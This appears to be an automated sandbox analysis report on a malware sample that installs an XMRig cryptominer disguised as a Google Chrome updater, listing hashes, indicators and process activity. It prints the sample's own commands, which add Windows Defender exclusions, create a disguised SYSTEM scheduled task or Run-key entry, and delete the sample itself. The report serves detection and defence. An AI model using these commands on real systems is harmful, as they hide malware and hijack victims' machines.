Overview
overview
10Static
static
3grhsghsGHs...y8.exe
windows7-x64
10grhsghsGHs...y8.exe
windows10-2004-x64
10grhsghsGHs...SE.exe
windows7-x64
10grhsghsGHs...SE.exe
windows10-2004-x64
10grhsghsGHs...CD.exe
windows7-x64
10grhsghsGHs...CD.exe
windows10-2004-x64
10grhsghsGHs...Da.exe
windows7-x64
10grhsghsGHs...Da.exe
windows10-2004-x64
10grhsghsGHs...wq.exe
windows7-x64
10grhsghsGHs...wq.exe
windows10-2004-x64
10grhsghsGHs...r7.exe
windows7-x64
10grhsghsGHs...r7.exe
windows10-2004-x64
10grhsghsGHs...XJ.exe
windows7-x64
10grhsghsGHs...XJ.exe
windows10-2004-x64
10grhsghsGHs...eg.exe
windows7-x64
10grhsghsGHs...eg.exe
windows10-2004-x64
10grhsghsGHs...5H.exe
windows7-x64
10grhsghsGHs...5H.exe
windows10-2004-x64
10grhsghsGHs...XN.exe
windows7-x64
10grhsghsGHs...XN.exe
windows10-2004-x64
10grhsghsGHs...T3.exe
windows7-x64
10grhsghsGHs...T3.exe
windows10-2004-x64
10grhsghsGHs...9r.exe
windows7-x64
10grhsghsGHs...9r.exe
windows10-2004-x64
10grhsghsGHs...GR.exe
windows7-x64
10grhsghsGHs...GR.exe
windows10-2004-x64
10grhsghsGHs...EX.exe
windows7-x64
10grhsghsGHs...EX.exe
windows10-2004-x64
10grhsghsGHs...EA.exe
windows7-x64
10grhsghsGHs...EA.exe
windows10-2004-x64
10grhsghsGHs...FB.exe
windows7-x64
10grhsghsGHs...FB.exe
windows10-2004-x64
10Resubmissions
25-01-2024 16:55
240125-vfcyksbhgr 1024-01-2024 17:15
240124-vstf4aecaj 1023-01-2024 19:27
240123-x6cfvagbd9 1023-01-2024 19:27
240123-x6bvbafgem 1023-01-2024 19:27
240123-x6bjjsgbd8 1023-01-2024 19:27
240123-x6ax1sfgek 1023-01-2024 19:27
240123-x6abgsfgej 1023-01-2024 19:27
240123-x591qagbd7 1023-01-2024 19:27
240123-x59d7agbd6 1023-01-2024 19:27
240123-x584esgbd5 10Analysis
-
max time kernel
1801s -
max time network
1793s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
24-01-2024 17:15
Static task
static1
Behavioral task
behavioral1
Sample
grhsghsGHswgh/3JynzWc6LxNCT2y8.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
grhsghsGHswgh/3JynzWc6LxNCT2y8.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral3
Sample
grhsghsGHswgh/6aNn9vLJCQVfagSE.exe
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
grhsghsGHswgh/6aNn9vLJCQVfagSE.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
grhsghsGHswgh/6vHkJ4UErTSS5ECD.exe
Resource
win7-20231129-en
Behavioral task
behavioral6
Sample
grhsghsGHswgh/6vHkJ4UErTSS5ECD.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
grhsghsGHswgh/Be5sCbvuma2nkHDa.exe
Resource
win7-20231215-en
Behavioral task
behavioral8
Sample
grhsghsGHswgh/Be5sCbvuma2nkHDa.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral9
Sample
grhsghsGHswgh/DLKFnAGYJBNTnxwq.exe
Resource
win7-20231215-en
Behavioral task
behavioral10
Sample
grhsghsGHswgh/DLKFnAGYJBNTnxwq.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral11
Sample
grhsghsGHswgh/EtPLMpbCyFJpMJr7.exe
Resource
win7-20231215-en
Behavioral task
behavioral12
Sample
grhsghsGHswgh/EtPLMpbCyFJpMJr7.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral13
Sample
grhsghsGHswgh/Gu3PdXt79NF7EJXJ.exe
Resource
win7-20231129-en
Behavioral task
behavioral14
Sample
grhsghsGHswgh/Gu3PdXt79NF7EJXJ.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral15
Sample
grhsghsGHswgh/JqLvG94UkYjhxAeg.exe
Resource
win7-20231215-en
Behavioral task
behavioral16
Sample
grhsghsGHswgh/JqLvG94UkYjhxAeg.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral17
Sample
grhsghsGHswgh/LM3BR4UBmKBzBP5H.exe
Resource
win7-20231215-en
Behavioral task
behavioral18
Sample
grhsghsGHswgh/LM3BR4UBmKBzBP5H.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral19
Sample
grhsghsGHswgh/M8xUNW42QxTLMRXN.exe
Resource
win7-20231215-en
Behavioral task
behavioral20
Sample
grhsghsGHswgh/M8xUNW42QxTLMRXN.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral21
Sample
grhsghsGHswgh/Q5EUCWHU7pMYBfT3.exe
Resource
win7-20231215-en
Behavioral task
behavioral22
Sample
grhsghsGHswgh/Q5EUCWHU7pMYBfT3.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral23
Sample
grhsghsGHswgh/UMRsPGc4u9tycx9r.exe
Resource
win7-20231215-en
Behavioral task
behavioral24
Sample
grhsghsGHswgh/UMRsPGc4u9tycx9r.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral25
Sample
grhsghsGHswgh/UU4Ddwqm5zcuLzGR.exe
Resource
win7-20231215-en
Behavioral task
behavioral26
Sample
grhsghsGHswgh/UU4Ddwqm5zcuLzGR.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral27
Sample
grhsghsGHswgh/XJEzW6M7WvHaF3EX.exe
Resource
win7-20231129-en
Behavioral task
behavioral28
Sample
grhsghsGHswgh/XJEzW6M7WvHaF3EX.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral29
Sample
grhsghsGHswgh/Y2JYGshMHJGuGREA.exe
Resource
win7-20231129-en
Behavioral task
behavioral30
Sample
grhsghsGHswgh/Y2JYGshMHJGuGREA.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral31
Sample
grhsghsGHswgh/Yvdp8t5knpQz7sFB.exe
Resource
win7-20231215-en
General
-
Target
grhsghsGHswgh/Y2JYGshMHJGuGREA.exe
-
Size
2.0MB
-
MD5
a16a669a09bf158058b83e04e69fe38e
-
SHA1
f6c94763850d9e590d86057139e8895a7aacdeea
-
SHA256
cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e
-
SHA512
658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6
-
SSDEEP
49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
Processes:
Y2JYGshMHJGuGREA.exeupdater.execonhost.exedescription pid process target process PID 1992 created 3528 1992 Y2JYGshMHJGuGREA.exe Explorer.EXE PID 1992 created 3528 1992 Y2JYGshMHJGuGREA.exe Explorer.EXE PID 1992 created 3528 1992 Y2JYGshMHJGuGREA.exe Explorer.EXE PID 1992 created 3528 1992 Y2JYGshMHJGuGREA.exe Explorer.EXE PID 4772 created 3528 4772 updater.exe Explorer.EXE PID 4772 created 3528 4772 updater.exe Explorer.EXE PID 4772 created 3528 4772 updater.exe Explorer.EXE PID 4772 created 3528 4772 updater.exe Explorer.EXE PID 4916 created 3528 4916 conhost.exe Explorer.EXE PID 4772 created 3528 4772 updater.exe Explorer.EXE -
XMRig Miner payload 30 IoCs
Processes:
resource yara_rule behavioral30/memory/3096-128-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp xmrig behavioral30/memory/3096-132-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp xmrig behavioral30/memory/3096-133-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp xmrig behavioral30/memory/3096-135-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp xmrig behavioral30/memory/3096-139-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp xmrig behavioral30/memory/3096-141-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp xmrig behavioral30/memory/3096-143-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp xmrig behavioral30/memory/3096-145-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp xmrig behavioral30/memory/3096-147-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp xmrig behavioral30/memory/3096-149-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp xmrig behavioral30/memory/3096-151-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp xmrig behavioral30/memory/3096-153-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp xmrig behavioral30/memory/3096-155-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp xmrig behavioral30/memory/3096-157-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp xmrig behavioral30/memory/3096-159-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp xmrig behavioral30/memory/3096-161-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp xmrig behavioral30/memory/3096-163-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp xmrig behavioral30/memory/3096-165-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp xmrig behavioral30/memory/3096-167-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp xmrig behavioral30/memory/3096-169-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp xmrig behavioral30/memory/3096-171-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp xmrig behavioral30/memory/3096-173-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp xmrig behavioral30/memory/3096-175-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp xmrig behavioral30/memory/3096-177-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp xmrig behavioral30/memory/3096-179-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp xmrig behavioral30/memory/3096-181-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp xmrig behavioral30/memory/3096-183-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp xmrig behavioral30/memory/3096-185-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp xmrig behavioral30/memory/3096-187-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp xmrig behavioral30/memory/3096-189-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 4772 updater.exe -
Processes:
resource yara_rule behavioral30/memory/3096-124-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp upx behavioral30/memory/3096-128-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp upx behavioral30/memory/3096-132-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp upx behavioral30/memory/3096-133-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp upx behavioral30/memory/3096-135-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp upx behavioral30/memory/3096-139-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp upx behavioral30/memory/3096-141-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp upx behavioral30/memory/3096-143-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp upx behavioral30/memory/3096-145-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp upx behavioral30/memory/3096-147-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp upx behavioral30/memory/3096-149-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp upx behavioral30/memory/3096-151-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp upx behavioral30/memory/3096-153-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp upx behavioral30/memory/3096-155-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp upx behavioral30/memory/3096-157-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp upx behavioral30/memory/3096-159-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp upx behavioral30/memory/3096-161-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp upx behavioral30/memory/3096-163-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp upx behavioral30/memory/3096-165-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp upx behavioral30/memory/3096-167-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp upx behavioral30/memory/3096-169-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp upx behavioral30/memory/3096-171-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp upx behavioral30/memory/3096-173-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp upx behavioral30/memory/3096-175-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp upx behavioral30/memory/3096-177-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp upx behavioral30/memory/3096-179-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp upx behavioral30/memory/3096-181-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp upx behavioral30/memory/3096-183-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp upx behavioral30/memory/3096-185-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp upx behavioral30/memory/3096-187-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp upx behavioral30/memory/3096-189-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp upx -
Drops file in System32 directory 3 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
updater.exedescription pid process target process PID 4772 set thread context of 4916 4772 updater.exe conhost.exe PID 4772 set thread context of 3096 4772 updater.exe conhost.exe -
Drops file in Program Files directory 4 IoCs
Processes:
updater.execmd.execmd.exeY2JYGshMHJGuGREA.exedescription ioc process File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Chrome\updater.exe Y2JYGshMHJGuGREA.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 30 IoCs
Processes:
Y2JYGshMHJGuGREA.exepowershell.exepowershell.exepowershell.exeupdater.exepowershell.exepowershell.execonhost.exepid process 1992 Y2JYGshMHJGuGREA.exe 1992 Y2JYGshMHJGuGREA.exe 952 powershell.exe 952 powershell.exe 1992 Y2JYGshMHJGuGREA.exe 1992 Y2JYGshMHJGuGREA.exe 1216 powershell.exe 1216 powershell.exe 1992 Y2JYGshMHJGuGREA.exe 1992 Y2JYGshMHJGuGREA.exe 1992 Y2JYGshMHJGuGREA.exe 1992 Y2JYGshMHJGuGREA.exe 5100 powershell.exe 5100 powershell.exe 4772 updater.exe 4772 updater.exe 4380 powershell.exe 4380 powershell.exe 4772 updater.exe 4772 updater.exe 2608 powershell.exe 2608 powershell.exe 4772 updater.exe 4772 updater.exe 4772 updater.exe 4772 updater.exe 4916 conhost.exe 4916 conhost.exe 4772 updater.exe 4772 updater.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 680 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 952 powershell.exe Token: SeDebugPrivilege 1216 powershell.exe Token: SeIncreaseQuotaPrivilege 1216 powershell.exe Token: SeSecurityPrivilege 1216 powershell.exe Token: SeTakeOwnershipPrivilege 1216 powershell.exe Token: SeLoadDriverPrivilege 1216 powershell.exe Token: SeSystemProfilePrivilege 1216 powershell.exe Token: SeSystemtimePrivilege 1216 powershell.exe Token: SeProfSingleProcessPrivilege 1216 powershell.exe Token: SeIncBasePriorityPrivilege 1216 powershell.exe Token: SeCreatePagefilePrivilege 1216 powershell.exe Token: SeBackupPrivilege 1216 powershell.exe Token: SeRestorePrivilege 1216 powershell.exe Token: SeShutdownPrivilege 1216 powershell.exe Token: SeDebugPrivilege 1216 powershell.exe Token: SeSystemEnvironmentPrivilege 1216 powershell.exe Token: SeRemoteShutdownPrivilege 1216 powershell.exe Token: SeUndockPrivilege 1216 powershell.exe Token: SeManageVolumePrivilege 1216 powershell.exe Token: 33 1216 powershell.exe Token: 34 1216 powershell.exe Token: 35 1216 powershell.exe Token: 36 1216 powershell.exe Token: SeIncreaseQuotaPrivilege 1216 powershell.exe Token: SeSecurityPrivilege 1216 powershell.exe Token: SeTakeOwnershipPrivilege 1216 powershell.exe Token: SeLoadDriverPrivilege 1216 powershell.exe Token: SeSystemProfilePrivilege 1216 powershell.exe Token: SeSystemtimePrivilege 1216 powershell.exe Token: SeProfSingleProcessPrivilege 1216 powershell.exe Token: SeIncBasePriorityPrivilege 1216 powershell.exe Token: SeCreatePagefilePrivilege 1216 powershell.exe Token: SeBackupPrivilege 1216 powershell.exe Token: SeRestorePrivilege 1216 powershell.exe Token: SeShutdownPrivilege 1216 powershell.exe Token: SeDebugPrivilege 1216 powershell.exe Token: SeSystemEnvironmentPrivilege 1216 powershell.exe Token: SeRemoteShutdownPrivilege 1216 powershell.exe Token: SeUndockPrivilege 1216 powershell.exe Token: SeManageVolumePrivilege 1216 powershell.exe Token: 33 1216 powershell.exe Token: 34 1216 powershell.exe Token: 35 1216 powershell.exe Token: 36 1216 powershell.exe Token: SeIncreaseQuotaPrivilege 1216 powershell.exe Token: SeSecurityPrivilege 1216 powershell.exe Token: SeTakeOwnershipPrivilege 1216 powershell.exe Token: SeLoadDriverPrivilege 1216 powershell.exe Token: SeSystemProfilePrivilege 1216 powershell.exe Token: SeSystemtimePrivilege 1216 powershell.exe Token: SeProfSingleProcessPrivilege 1216 powershell.exe Token: SeIncBasePriorityPrivilege 1216 powershell.exe Token: SeCreatePagefilePrivilege 1216 powershell.exe Token: SeBackupPrivilege 1216 powershell.exe Token: SeRestorePrivilege 1216 powershell.exe Token: SeShutdownPrivilege 1216 powershell.exe Token: SeDebugPrivilege 1216 powershell.exe Token: SeSystemEnvironmentPrivilege 1216 powershell.exe Token: SeRemoteShutdownPrivilege 1216 powershell.exe Token: SeUndockPrivilege 1216 powershell.exe Token: SeManageVolumePrivilege 1216 powershell.exe Token: 33 1216 powershell.exe Token: 34 1216 powershell.exe Token: 35 1216 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
cmd.exepowershell.exeupdater.execmd.exedescription pid process target process PID 3820 wrote to memory of 1028 3820 cmd.exe choice.exe PID 3820 wrote to memory of 1028 3820 cmd.exe choice.exe PID 5100 wrote to memory of 1472 5100 powershell.exe schtasks.exe PID 5100 wrote to memory of 1472 5100 powershell.exe schtasks.exe PID 4772 wrote to memory of 4916 4772 updater.exe conhost.exe PID 4760 wrote to memory of 1892 4760 cmd.exe WMIC.exe PID 4760 wrote to memory of 1892 4760 cmd.exe WMIC.exe PID 4772 wrote to memory of 3096 4772 updater.exe conhost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3528
-
C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Y2JYGshMHJGuGREA.exe"C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Y2JYGshMHJGuGREA.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1992 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:952 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1216 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Y2JYGshMHJGuGREA.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3820 -
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 33⤵PID:1028
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
